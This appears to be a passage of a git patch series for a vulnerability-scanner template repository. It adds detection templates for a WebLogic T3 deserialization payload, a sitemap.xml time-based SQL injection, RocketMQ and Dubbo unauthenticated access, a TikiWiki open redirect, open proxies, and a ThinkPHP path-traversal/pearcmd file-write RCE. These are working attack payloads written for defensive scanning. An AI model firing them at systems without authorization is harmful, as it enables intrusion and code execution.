tags: ibm,websphere,misconfig - verified: "true" http: - method: GET diff --git a/network/cves/2016/CVE-2016-3510.yaml b/network/cves/2016/CVE-2016-3510.yaml index bfe1897ded..3a20d79247 100644 --- a/network/cves/2016/CVE-2016-3510.yaml +++ b/network/cves/2016/CVE-2016-3510.yaml @@ -12,7 +12,6 @@ info: max-request: 1 verified: true tags: cve,cve2016,weblogic,t3,rce,oast,deserialization,network - verified: "true" variables: start: "016501ffffffffffffffff000000710000ea6000000018432ec6a2a63985b5af7d63e64383f42a6d92c9e9af0f9472027973720078720178720278700000000c00000002000000000000000000000001007070707070700000000c00000002000000000000000000000001007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200094900056d616a6f724900056d696e6f7249000b706174636855706461746549000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000" From 902e4c2b1340124a2238b62c5cac5ca384ec35bc Mon Sep 17 00:00:00 2001 From: Guillaume Granjus Date: Wed, 7 Jun 2023 20:22:16 +0200 Subject: [PATCH 146/609] Add favicon detect --- http/technologies/favicon-detect.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/http/technologies/favicon-detect.yaml b/http/technologies/favicon-detect.yaml index a661ef8958..29a7e03165 100644 --- a/http/technologies/favicon-detect.yaml +++ b/http/technologies/favicon-detect.yaml @@ -2668,3 +2668,8 @@ http: name: "Sophos Email Appliance" dsl: - "status_code==200 && (\"-830586692\" == mmh3(base64_py(body)))" + + - type: dsl + name: "Temporal Web UI" + dsl: + - "status_code==200 && (\"557327884\" == mmh3(base64_py(body)))" From 9f0e7adcff3d3e6bd0533f06fef9153e19c346bc Mon Sep 17 00:00:00 2001 From: Guillaume Granjus Date: Wed, 7 Jun 2023 21:25:58 +0200 Subject: [PATCH 147/609] Add unauthenticated temporal web ui --- headless/unauthenticated-temporal-web-ui.yaml | 32 +++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 headless/unauthenticated-temporal-web-ui.yaml diff --git a/headless/unauthenticated-temporal-web-ui.yaml b/headless/unauthenticated-temporal-web-ui.yaml new file mode 100644 index 0000000000..fcc7c189a8 --- /dev/null +++ b/headless/unauthenticated-temporal-web-ui.yaml @@ -0,0 +1,32 @@ +id: unauthenticated-temporal-web-ui + +info: + name: Unauthenticated Temporal Web UI + author: ggranjus + severity: high + description: Temporal Web UI expose workflow's states, inputs and outputs. + reference: + - https://docs.temporal.io/web-ui + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 + metadata: + max-request: 1 + shodan-query: http.favicon.hash:557327884 + verified: true + tags: temporal,unauth,headless + +headless: + - steps: + - action: navigate + args: + url: "{{BaseURL}}" + + - action: waitload + + matchers: + - part: body + type: word + words: + - "View Recent Workflows" From 79ddc770b700450a4abc7ad77cbfcf06812ac80c Mon Sep 17 00:00:00 2001 From: B Aravind <89305482+aravindb26@users.noreply.github.com> Date: Fri, 9 Jun 2023 17:49:42 +0530 Subject: [PATCH 148/609] sitemap-sql It will be useful to detect sql on the sitemap.xml endpoints or extensions --- .../misconfiguration/sitemap-sql-detector.yaml | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 http/misconfiguration/sitemap-sql-detector.yaml diff --git a/http/misconfiguration/sitemap-sql-detector.yaml b/http/misconfiguration/sitemap-sql-detector.yaml new file mode 100644 index 0000000000..de7957ca73 --- /dev/null +++ b/http/misconfiguration/sitemap-sql-detector.yaml @@ -0,0 +1,18 @@ +id: sql-injection +info: + name: SQL Injection + author: Aravind + severity: high + tags: [web, injection, sql] +requests: + - method: GET + path: + - "{{BaseURL}}/sitemap.xml?offset=1;SELECT IF((8303>8302),SLEEP(9),2356)#" + matchers-condition: or + matchers: + - type: status + status: + - 200 + - type: regex + part: body + regex: "Expected response content or regex here" From 730f945dc4ee3e39142c2c0f5ebaf08340f64423 Mon Sep 17 00:00:00 2001 From: B Aravind <89305482+aravindb26@users.noreply.github.com> Date: Fri, 9 Jun 2023 18:12:42 +0530 Subject: [PATCH 149/609] Update sitemap-sql-detector.yaml --- http/misconfiguration/sitemap-sql-detector.yaml | 13 +++++++------ 1 file changed, 7 insertions(+), 6 deletions(-) diff --git a/http/misconfiguration/sitemap-sql-detector.yaml b/http/misconfiguration/sitemap-sql-detector.yaml index de7957ca73..169ef66c60 100644 --- a/http/misconfiguration/sitemap-sql-detector.yaml +++ b/http/misconfiguration/sitemap-sql-detector.yaml @@ -1,18 +1,19 @@ id: sql-injection info: - name: SQL Injection + name: SQL Injection with Response Time Analysis author: Aravind severity: high tags: [web, injection, sql] requests: - method: GET path: - - "{{BaseURL}}/sitemap.xml?offset=1;SELECT IF((8303>8302),SLEEP(9),2356)#" - matchers-condition: or + - "{{BaseURL}}/sitemap.xml?offset=1;SELECT IF((SLEEP(9)),1,2356)#" + matchers-condition: and matchers: - type: status status: - 200 - - type: regex - part: body - regex: "Expected response content or regex here" + - type: response-time + condition: greater-than + comparison: + - 9000 \ No newline at end of file From 5e7df3ed5fc423f779e60a4ab97992a22b8ea598 Mon Sep 17 00:00:00 2001 From: B Aravind <89305482+aravindb26@users.noreply.github.com> Date: Fri, 9 Jun 2023 18:17:40 +0530 Subject: [PATCH 150/609] Update sitemap-sql-detector.yaml --- http/misconfiguration/sitemap-sql-detector.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/http/misconfiguration/sitemap-sql-detector.yaml b/http/misconfiguration/sitemap-sql-detector.yaml index 169ef66c60..b7bd903623 100644 --- a/http/misconfiguration/sitemap-sql-detector.yaml +++ b/http/misconfiguration/sitemap-sql-detector.yaml @@ -16,4 +16,5 @@ requests: - type: response-time condition: greater-than comparison: - - 9000 \ No newline at end of file + - 9000 + \ No newline at end of file From 2df5c29d909c2b258ae30f4f8f7c573e97d56e82 Mon Sep 17 00:00:00 2001 From: B Aravind <89305482+aravindb26@users.noreply.github.com> Date: Fri, 9 Jun 2023 19:28:16 +0530 Subject: [PATCH 151/609] Update sitemap-sql-detector.yaml --- http/misconfiguration/sitemap-sql-detector.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/misconfiguration/sitemap-sql-detector.yaml b/http/misconfiguration/sitemap-sql-detector.yaml index b7bd903623..1334ac1646 100644 --- a/http/misconfiguration/sitemap-sql-detector.yaml +++ b/http/misconfiguration/sitemap-sql-detector.yaml @@ -13,8 +13,8 @@ requests: - type: status status: - 200 - - type: response-time - condition: greater-than + - type: response time + condition: greater than comparison: - 9000 \ No newline at end of file From 9538ee62ae602c603c522c22d9d3cbfa8aaaeccc Mon Sep 17 00:00:00 2001 From: B Aravind <89305482+aravindb26@users.noreply.github.com> Date: Fri, 9 Jun 2023 19:34:49 +0530 Subject: [PATCH 152/609] Update sitemap-sql-detector.yaml --- http/misconfiguration/sitemap-sql-detector.yaml | 7 +------ 1 file changed, 1 insertion(+), 6 deletions(-) diff --git a/http/misconfiguration/sitemap-sql-detector.yaml b/http/misconfiguration/sitemap-sql-detector.yaml index 1334ac1646..bdcb59ae0b 100644 --- a/http/misconfiguration/sitemap-sql-detector.yaml +++ b/http/misconfiguration/sitemap-sql-detector.yaml @@ -1,6 +1,6 @@ id: sql-injection info: - name: SQL Injection with Response Time Analysis + name: SQL Injection author: Aravind severity: high tags: [web, injection, sql] @@ -13,8 +13,3 @@ requests: - type: status status: - 200 - - type: response time - condition: greater than - comparison: - - 9000 - \ No newline at end of file From aaf5619df9bad257f8914f2312a2aea7aae90442 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 9 Jun 2023 19:49:59 +0530 Subject: [PATCH 153/609] template update --- .../sitemap-sql-detector.yaml | 26 ++++++++++++------- 1 file changed, 16 insertions(+), 10 deletions(-) diff --git a/http/misconfiguration/sitemap-sql-detector.yaml b/http/misconfiguration/sitemap-sql-detector.yaml index bdcb59ae0b..31ab3c881d 100644 --- a/http/misconfiguration/sitemap-sql-detector.yaml +++ b/http/misconfiguration/sitemap-sql-detector.yaml @@ -1,15 +1,21 @@ id: sql-injection + info: - name: SQL Injection + name: Sitemap - SQL Injection author: Aravind severity: high - tags: [web, injection, sql] -requests: - - method: GET - path: - - "{{BaseURL}}/sitemap.xml?offset=1;SELECT IF((SLEEP(9)),1,2356)#" - matchers-condition: and + tags: misconfig,sitemap,sqli + +http: + - raw: + - | + @timeout: 15s + POST /sitemap.xml?offset=1;SELECT IF((SLEEP(9)),1,2356)# HTTP/1.1 + Host: {{Hostname}} + matchers: - - type: status - status: - - 200 + - type: dsl + dsl: + - 'duration>=9' + - 'status_code == 200' + condition: and From 197e92e2b9ef65c5aadfa009f4b1007685c47f8f Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Sat, 10 Jun 2023 00:29:03 +0530 Subject: [PATCH 154/609] minor -update --- ...emporal-web-ui.yaml => unauth-temporal-web-ui.yaml} | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) rename headless/{unauthenticated-temporal-web-ui.yaml => unauth-temporal-web-ui.yaml} (74%) diff --git a/headless/unauthenticated-temporal-web-ui.yaml b/headless/unauth-temporal-web-ui.yaml similarity index 74% rename from headless/unauthenticated-temporal-web-ui.yaml rename to headless/unauth-temporal-web-ui.yaml index fcc7c189a8..c0c8468c1c 100644 --- a/headless/unauthenticated-temporal-web-ui.yaml +++ b/headless/unauth-temporal-web-ui.yaml @@ -1,10 +1,10 @@ -id: unauthenticated-temporal-web-ui +id: unauth-temporal-web-ui info: - name: Unauthenticated Temporal Web UI + name: Temporal Web UI - Unauthenticated Access author: ggranjus severity: high - description: Temporal Web UI expose workflow's states, inputs and outputs. + description: Temporal Web UI was able to be accessed because no authentication was required reference: - https://docs.temporal.io/web-ui classification: @@ -12,9 +12,9 @@ info: cvss-score: 0.0 cwe-id: CWE-200 metadata: - max-request: 1 + verified: 'true' shodan-query: http.favicon.hash:557327884 - verified: true + tags: temporal,unauth,headless headless: From 445b0796143441cd0fed8ee2befcacade2ef2ef5 Mon Sep 17 00:00:00 2001 From: J4vaovo <128683738+j4vaovo@users.noreply.github.com> Date: Wed, 14 Jun 2023 00:10:15 +0800 Subject: [PATCH 155/609] Create apache-rocketmq-broker-unauth.yaml --- network/apache-rocketmq-broker-unauth.yaml | 24 ++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 network/apache-rocketmq-broker-unauth.yaml diff --git a/network/apache-rocketmq-broker-unauth.yaml b/network/apache-rocketmq-broker-unauth.yaml new file mode 100644 index 0000000000..29dc432482 --- /dev/null +++ b/network/apache-rocketmq-broker-unauth.yaml @@ -0,0 +1,24 @@ +id: apache-rocketmq-broker-unauth + +info: + name: Rocketmq - Unauthenticated Access + author: j4vaovo + severity: high + description: Rocketmq Unauthenticated Access. + reference: + tags: network,rocketmq,unauth + +network: + - inputs: + - data: "000000c9000000b17b22636f6465223a32352c226578744669656c6473223a7b224163636573734b6579223a22726f636b65746d7132222c225369676e6174757265223a222b7a6452645575617a6953516b4855557164727477673146386a6b3d227d2c22666c6167223a302c226c616e6775616765223a224a415641222c226f7061717565223a302c2273657269616c697a655479706543757272656e74525043223a224a534f4e222c2276657273696f6e223a3433337d746573745f6b65793d746573745f76616c75650a0a" + type: hex + + host: + - "{{Hostname}}" + - "{{Host}}:10911" + read-size: 2048 + + matchers: + - type: word + words: + - "serializeTypeCurrentRPC" From 0cd15711c90c55af782ce8cdf259af9d03434c84 Mon Sep 17 00:00:00 2001 From: J4vaovo <128683738+j4vaovo@users.noreply.github.com> Date: Wed, 14 Jun 2023 00:13:51 +0800 Subject: [PATCH 156/609] Update apache-rocketmq-broker-unauth.yaml --- network/apache-rocketmq-broker-unauth.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/network/apache-rocketmq-broker-unauth.yaml b/network/apache-rocketmq-broker-unauth.yaml index 29dc432482..d6272a621a 100644 --- a/network/apache-rocketmq-broker-unauth.yaml +++ b/network/apache-rocketmq-broker-unauth.yaml @@ -3,10 +3,10 @@ id: apache-rocketmq-broker-unauth info: name: Rocketmq - Unauthenticated Access author: j4vaovo - severity: high + severity: critical description: Rocketmq Unauthenticated Access. reference: - tags: network,rocketmq,unauth + tags: network,rocketmq,broker,unauth network: - inputs: From 8adf33c65e0633672c746af468abda528e227e6c Mon Sep 17 00:00:00 2001 From: J4vaovo <128683738+j4vaovo@users.noreply.github.com> Date: Wed, 14 Jun 2023 00:14:49 +0800 Subject: [PATCH 157/609] Update apache-rocketmq-broker-unauth.yaml --- network/apache-rocketmq-broker-unauth.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/network/apache-rocketmq-broker-unauth.yaml b/network/apache-rocketmq-broker-unauth.yaml index d6272a621a..ec79d0deb4 100644 --- a/network/apache-rocketmq-broker-unauth.yaml +++ b/network/apache-rocketmq-broker-unauth.yaml @@ -1,7 +1,7 @@ id: apache-rocketmq-broker-unauth info: - name: Rocketmq - Unauthenticated Access + name: Rocketmq Broker - Unauthenticated Access author: j4vaovo severity: critical description: Rocketmq Unauthenticated Access. From 1ee72e0cf8c753169a0844dbcb1635d9bf8da909 Mon Sep 17 00:00:00 2001 From: J4vaovo <128683738+j4vaovo@users.noreply.github.com> Date: Wed, 14 Jun 2023 01:25:54 +0800 Subject: [PATCH 158/609] Update apache-rocketmq-broker-unauth.yaml --- network/apache-rocketmq-broker-unauth.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/network/apache-rocketmq-broker-unauth.yaml b/network/apache-rocketmq-broker-unauth.yaml index ec79d0deb4..9ca33bf8e4 100644 --- a/network/apache-rocketmq-broker-unauth.yaml +++ b/network/apache-rocketmq-broker-unauth.yaml @@ -1,7 +1,7 @@ id: apache-rocketmq-broker-unauth info: - name: Rocketmq Broker - Unauthenticated Access + name: Apache Rocketmq Broker - Unauthenticated Access author: j4vaovo severity: critical description: Rocketmq Unauthenticated Access. From 133c7c5854043743613905d4f9abcb49e50c178f Mon Sep 17 00:00:00 2001 From: J4vaovo <128683738+j4vaovo@users.noreply.github.com> Date: Wed, 14 Jun 2023 18:39:09 +0800 Subject: [PATCH 159/609] Create apache-dubbo-unauth.yaml --- network/apache-dubbo-unauth.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 network/apache-dubbo-unauth.yaml diff --git a/network/apache-dubbo-unauth.yaml b/network/apache-dubbo-unauth.yaml new file mode 100644 index 0000000000..2246661ade --- /dev/null +++ b/network/apache-dubbo-unauth.yaml @@ -0,0 +1,24 @@ +id: apache-dubbo-unauth + +info: + name: Apache Dubbo - Unauthenticated Access + author: j4vaovo + severity: high + description: Apache Dubbo Unauthenticated Access. + reference: + tags: network,dubbo,apache,unauth + +network: + - inputs: + - data: "68656c700d0a" + type: hex + + host: + - "{{Hostname}}" + - "{{Host}}:20880" + read-size: 2048 + + matchers: + - type: word + words: + - "trace [service] [method] [times]" From 3473c3fc13dd23939f105a021e2b05d0a1b359e4 Mon Sep 17 00:00:00 2001 From: J4vaovo <128683738+j4vaovo@users.noreply.github.com> Date: Wed, 14 Jun 2023 18:44:15 +0800 Subject: [PATCH 160/609] Update apache-rocketmq-broker-unauth.yaml --- network/apache-rocketmq-broker-unauth.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/network/apache-rocketmq-broker-unauth.yaml b/network/apache-rocketmq-broker-unauth.yaml index 9ca33bf8e4..a0dcbd1f91 100644 --- a/network/apache-rocketmq-broker-unauth.yaml +++ b/network/apache-rocketmq-broker-unauth.yaml @@ -4,9 +4,9 @@ info: name: Apache Rocketmq Broker - Unauthenticated Access author: j4vaovo severity: critical - description: Rocketmq Unauthenticated Access. + description: Apache Rocketmq Unauthenticated Access. reference: - tags: network,rocketmq,broker,unauth + tags: network,rocketmq,broker,apache,unauth network: - inputs: From 672a20bffbaaa60653f9da3a049aff3bb54f320d Mon Sep 17 00:00:00 2001 From: ctflearner <98345027+ctflearner@users.noreply.github.com> Date: Wed, 14 Jun 2023 21:42:05 +0530 Subject: [PATCH 161/609] Create CVE-2012-5321.yaml Added a New Nuclei Template as CVE-2012-5321 --- http/cves/2012/CVE-2012-5321.yaml | 34 +++++++++++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 http/cves/2012/CVE-2012-5321.yaml diff --git a/http/cves/2012/CVE-2012-5321.yaml b/http/cves/2012/CVE-2012-5321.yaml new file mode 100644 index 0000000000..527420789b --- /dev/null +++ b/http/cves/2012/CVE-2012-5321.yaml @@ -0,0 +1,34 @@ +id: CVE-2012-5321 + +info: + name: TikiWiki CMS/Groupware v8.3- Open Redirect + author: ctflearner + severity: medium + description: | + tiki-featured_link.php in TikiWiki CMS/Groupware 8.3 allows remote attackers to load arbitrary web site pages into frames and conduct phishing attacks via the url parameter, aka "frame injection + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2012-5321 + - https://www.exploit-db.com/exploits/36848 + - http://st2tea.blogspot.com/2012/02/tiki-wiki-cms-groupware-frame-injection.html + - https://exchange.xforce.ibmcloud.com/vulnerabilities/73403 + classification: + cvss-metrics: (AV:N/AC:M/Au:N/C:P/I:P/A:N) + cvss-score: 5.8 + cve-id: CVE-2012-5321 + cwe-id: CWE-20 + cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:8.3:*:*:*:*:*:*:* + metadata: + max-request: 1 + + tags: cve,cve2012,redirect,TikiWiki,CMS/Groupware + +http: + - method: GET + path: + - "{{BaseURL}}/tiki-featured_link.php?type=f&url=http://www.example2.com" + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)example2\.com.*$' From b176e33fc5f8c41e7350ad3ad163f1b4998cecc5 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 14 Jun 2023 21:49:41 +0530 Subject: [PATCH 162/609] lint fix --- http/cves/2012/CVE-2012-5321.yaml | 11 ++++------- 1 file changed, 4 insertions(+), 7 deletions(-) diff --git a/http/cves/2012/CVE-2012-5321.yaml b/http/cves/2012/CVE-2012-5321.yaml index 527420789b..71fb93567c 100644 --- a/http/cves/2012/CVE-2012-5321.yaml +++ b/http/cves/2012/CVE-2012-5321.yaml @@ -7,19 +7,16 @@ info: description: | tiki-featured_link.php in TikiWiki CMS/Groupware 8.3 allows remote attackers to load arbitrary web site pages into frames and conduct phishing attacks via the url parameter, aka "frame injection reference: - - https://nvd.nist.gov/vuln/detail/CVE-2012-5321 - - https://www.exploit-db.com/exploits/36848 - - http://st2tea.blogspot.com/2012/02/tiki-wiki-cms-groupware-frame-injection.html - - https://exchange.xforce.ibmcloud.com/vulnerabilities/73403 + - https://nvd.nist.gov/vuln/detail/CVE-2012-5321 + - https://www.exploit-db.com/exploits/36848 + - http://st2tea.blogspot.com/2012/02/tiki-wiki-cms-groupware-frame-injection.html + - https://exchange.xforce.ibmcloud.com/vulnerabilities/73403 classification: cvss-metrics: (AV:N/AC:M/Au:N/C:P/I:P/A:N) cvss-score: 5.8 cve-id: CVE-2012-5321 cwe-id: CWE-20 cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:8.3:*:*:*:*:*:*:* - metadata: - max-request: 1 - tags: cve,cve2012,redirect,TikiWiki,CMS/Groupware http: From c74ff10534a0c07078ec99fc8ec8705ba4170a3d Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 15 Jun 2023 17:41:15 +0530 Subject: [PATCH 163/609] Update CVE-2012-5321.yaml --- http/cves/2012/CVE-2012-5321.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/http/cves/2012/CVE-2012-5321.yaml b/http/cves/2012/CVE-2012-5321.yaml index 71fb93567c..16f166f839 100644 --- a/http/cves/2012/CVE-2012-5321.yaml +++ b/http/cves/2012/CVE-2012-5321.yaml @@ -1,7 +1,7 @@ id: CVE-2012-5321 info: - name: TikiWiki CMS/Groupware v8.3- Open Redirect + name: TikiWiki CMS/Groupware v8.3 - Open Redirect author: ctflearner severity: medium description: | @@ -22,10 +22,10 @@ info: http: - method: GET path: - - "{{BaseURL}}/tiki-featured_link.php?type=f&url=http://www.example2.com" + - "{{BaseURL}}/tiki-featured_link.php?type=f&url=http://interact.sh" matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)example2\.com.*$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' From b82afbb89308c6f8a760342e8a3022cf57f23e72 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 15 Jun 2023 21:43:52 +0530 Subject: [PATCH 164/609] Update webview-addjavascript-interface.yaml --- file/android/webview-addjavascript-interface.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/file/android/webview-addjavascript-interface.yaml b/file/android/webview-addjavascript-interface.yaml index d21f9e80f2..168078bf95 100644 --- a/file/android/webview-addjavascript-interface.yaml +++ b/file/android/webview-addjavascript-interface.yaml @@ -8,7 +8,7 @@ info: classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 - cwe-id: CWE-200 + cwe-id: CWE-200 tags: android,file file: From a855079a5b1a4c904dc04f038122704e3546edf6 Mon Sep 17 00:00:00 2001 From: gtrrnr <62451710+gtrrnr@users.noreply.github.com> Date: Fri, 16 Jun 2023 11:48:11 +0300 Subject: [PATCH 165/609] Create open-proxy-external.yaml Simple detection of open http proxies. --- .../proxy/open-proxy-external.yaml | 36 +++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 misconfiguration/proxy/open-proxy-external.yaml diff --git a/misconfiguration/proxy/open-proxy-external.yaml b/misconfiguration/proxy/open-proxy-external.yaml new file mode 100644 index 0000000000..3bb88e3c1f --- /dev/null +++ b/misconfiguration/proxy/open-proxy-external.yaml @@ -0,0 +1,36 @@ +id: open-proxy-external + +info: + name: Open Proxy To External Network + author: gtrrnr + severity: high + description: The host is configured as a proxy which allows access to other hosts on the external network. + reference: + - https://en.wikipedia.org/wiki/Open_proxy + - https://www.acunetix.com/vulnerabilities/web/apache-configured-to-run-as-proxy/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 8.6 + cwe-id: CWE-441 + remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. + tags: exposure,config,proxy,misconfig + metadata: + max-request: 2 + +http: + - raw: + - |+ + GET http://example.com HTTP/1.1 + Host: example.com + + - |+ + GET http://{{interactsh-url}} HTTP/1.1 + Host: {{interactsh-url}} + + unsafe: true + matchers: + - type: dsl + dsl: + - contains(body_1, "www.iana.org") + - contains(header_2, "X-Interactsh-Version") + condition: or From 673689a5c0a6dc4d460adad2c7d712e344749a8a Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 19 Jun 2023 16:11:59 +0530 Subject: [PATCH 166/609] re-write template --- cnvd/2022/CNVD-2022-86535.yaml | 53 ----------------------------- http/cnvd/2022/CNVD-2022-86535.yaml | 40 ++++++++++++++++++++++ 2 files changed, 40 insertions(+), 53 deletions(-) delete mode 100644 cnvd/2022/CNVD-2022-86535.yaml create mode 100644 http/cnvd/2022/CNVD-2022-86535.yaml diff --git a/cnvd/2022/CNVD-2022-86535.yaml b/cnvd/2022/CNVD-2022-86535.yaml deleted file mode 100644 index 8132c67bd1..0000000000 --- a/cnvd/2022/CNVD-2022-86535.yaml +++ /dev/null @@ -1,53 +0,0 @@ -id: CNVD-2022-86535 -info: - name: Thinkphp Multi Language File Inc And RCE - author: arliya - severity: high - description: 'ThinkPHP is an open source lightweight PHP framework designed to simplify enterprise application development and agile WEB application development. ThinkPHP has a command execution vulnerability because the multi-language function is enabled and the parameter passing of parameter lang is not strictly filtered. Attackers can use this vulnerability to execute commands.' - reference: ["https://www.cnvd.org.cn/flaw/show/CNVD-2022-86535"] - tags: 'cnvd,cnvd2022,thinkphp,rce' - -variables: - random-path: "{{to_lower(rand_base(8))}}" - -# The version with the bug will set the value of the parameter after lang to the cookie regardless of whether the file -# was successfully included, while the fixed version will return the language specified by the client accept-language -stop-at-first-match: true -requests: -# check by url - - method: GET - path: - - "{{BaseURL}}/public/?lang=../../../../../public/{{random-path}}" - - "{{BaseURL}}/index.php?lang=../../../../../public/{{random-path}}" - - "{{BaseURL}}/?lang=../../../../../public/{{random-path}}" - matchers: - - type: word - part: header - words: - - "Set-Cookie: think_lang=..%2F..%2F..%2F..%2F..%2Fpublic%2F{{random-path}}" -# check by header - - method: GET - path: - - "{{BaseURL}}/public/index.php" - - "{{BaseURL}}/index.php" - - "{{BaseURL}}/" - headers: - think-lang: ../../../../../public/{{random-path}} - matchers: - - type: word - part: header - words: - - "Set-Cookie: think_lang=..%2F..%2F..%2F..%2F..%2Fpublic%2F{{random-path}}" -# check by cookie - - method: GET - path: - - "{{BaseURL}}/public/index.php" - - "{{BaseURL}}/index.php" - - "{{BaseURL}}/" - headers: - Cookie: think_lang=../../../../../public/{{random-path}} - matchers: - - type: word - part: header - words: - - "Set-Cookie: think_lang=..%2F..%2F..%2F..%2F..%2Fpublic%2F{{random-path}}" \ No newline at end of file diff --git a/http/cnvd/2022/CNVD-2022-86535.yaml b/http/cnvd/2022/CNVD-2022-86535.yaml new file mode 100644 index 0000000000..b48d13059d --- /dev/null +++ b/http/cnvd/2022/CNVD-2022-86535.yaml @@ -0,0 +1,40 @@ +id: CNVD-2022-86535 + +info: + name: Thinkphp Multi Languag- File Inc And RCE + author: arliya,ritikchaddha + severity: high + description: | + ThinkPHP has a command execution vulnerability because the multi-language function is enabled and the parameter passing of parameter lang is not strictly filtered. Attackers can use this vulnerability to execute commands. + reference: + - https://www.cnvd.org.cn/flaw/show/CNVD-2022-86535 + tags: cnvd,cnvd2022,thinkphp,rce + +http: + - raw: + - | + GET /?lang=../../../../../usr/local/php/pearcmd HTTP/1.1 + Host: {{Hostname}} + + - | + GET / HTTP/1.1 + Host: {{Hostname}} + think-lang: ../../../../../usr/local/php/pearcmd + + - | + GET /?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/safedog()+{{rand_base(10)}}.log HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: or + matchers: + - type: word + part: set_cookie + words: + - "think_lang=..%2F..%2F..%2F..%2F" + + - type: word + part: body_3 + words: + - "CONFIGURATION" + - "Successfully created" + condition: and From 8fed5322ff504a552d3b9e5503344455d208a366 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 19 Jun 2023 16:16:36 +0530 Subject: [PATCH 167/609] added ref & metadata, fix lint --- http/cnvd/2022/CNVD-2022-86535.yaml | 24 ++++++++++++++---------- 1 file changed, 14 insertions(+), 10 deletions(-) diff --git a/http/cnvd/2022/CNVD-2022-86535.yaml b/http/cnvd/2022/CNVD-2022-86535.yaml index b48d13059d..92f5f94b8d 100644 --- a/http/cnvd/2022/CNVD-2022-86535.yaml +++ b/http/cnvd/2022/CNVD-2022-86535.yaml @@ -7,7 +7,11 @@ info: description: | ThinkPHP has a command execution vulnerability because the multi-language function is enabled and the parameter passing of parameter lang is not strictly filtered. Attackers can use this vulnerability to execute commands. reference: + - https://cn-sec.com/archives/1465289.html + - https://blog.csdn.net/qq_60614981/article/details/128724640 - https://www.cnvd.org.cn/flaw/show/CNVD-2022-86535 + metadata: + verified: true tags: cnvd,cnvd2022,thinkphp,rce http: @@ -27,14 +31,14 @@ http: matchers-condition: or matchers: - - type: word - part: set_cookie - words: - - "think_lang=..%2F..%2F..%2F..%2F" + - type: word + part: set_cookie + words: + - "think_lang=..%2F..%2F..%2F..%2F" - - type: word - part: body_3 - words: - - "CONFIGURATION" - - "Successfully created" - condition: and + - type: word + part: body_3 + words: + - "CONFIGURATION" + - "Successfully created" + condition: and From 239eda46b5348deb3807ffa84031b1352c899859 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Krzysztof=20Zaj=C4=85c?= Date: Wed, 21 Jun 2023 08:07:33 +0200 Subject: [PATCH 168/609] dell idrac detection --- http/exposed-panels/dell-idrac.yaml | 30 +++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 http/exposed-panels/dell-idrac.yaml diff --git a/http/exposed-panels/dell-idrac.yaml b/http/exposed-panels/dell-idrac.yaml new file mode 100644 index 0000000000..84c231693d --- /dev/null +++ b/http/exposed-panels/dell-idrac.yaml @@ -0,0 +1,30 @@ +id: dell-idrac + +info: + name: Dell IDRAC Panel - Detect + author: kazet + severity: info + description: Dell IDRAC panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 + metadata: + max-request: 2 + tags: panel,idrac + +http: + - method: GET + path: + - 